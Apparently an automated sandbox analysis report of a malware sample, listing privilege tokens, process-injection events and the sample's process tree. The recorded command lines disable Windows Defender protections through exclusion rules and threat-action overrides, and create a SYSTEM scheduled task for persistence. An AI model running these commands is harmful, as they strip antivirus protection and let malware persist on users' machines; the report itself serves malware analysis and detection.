Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4956 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe
PID 4956 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe
PID 4956 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe
PID 4076 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4076 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4076 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4824 wrote to memory of 4628 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4824 wrote to memory of 4628 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4824 wrote to memory of 4628 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4628 wrote to memory of 3584 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4628 wrote to memory of 3584 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4628 wrote to memory of 3584 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 4916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3584 wrote to memory of 4916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3584 wrote to memory of 4916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4076 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4076 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4076 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3092 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\zZhIfWQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3092 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\zZhIfWQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3092 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\zZhIfWQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2120 wrote to memory of 4720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 4720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 4720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4720 wrote to memory of 1996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4720 wrote to memory of 1996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4720 wrote to memory of 1996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 5084 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 5084 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 5084 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4348 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4348 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4348 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3656 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3656 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3656 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4484 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4484 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4484 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2064 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2064 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2064 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2912 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2912 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2912 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4328 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4328 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4328 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1044 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1044 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1044 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe

"C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe

.\Install.exe /AdidysikD "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bpJjqbWMDOjxkYrvBb" /SC once /ST 05:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\zZhIfWQ.exe\" Oz /exsite_idTMA 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\zZhIfWQ.exe

C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\zZhIfWQ.exe Oz /exsite_idTMA 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD 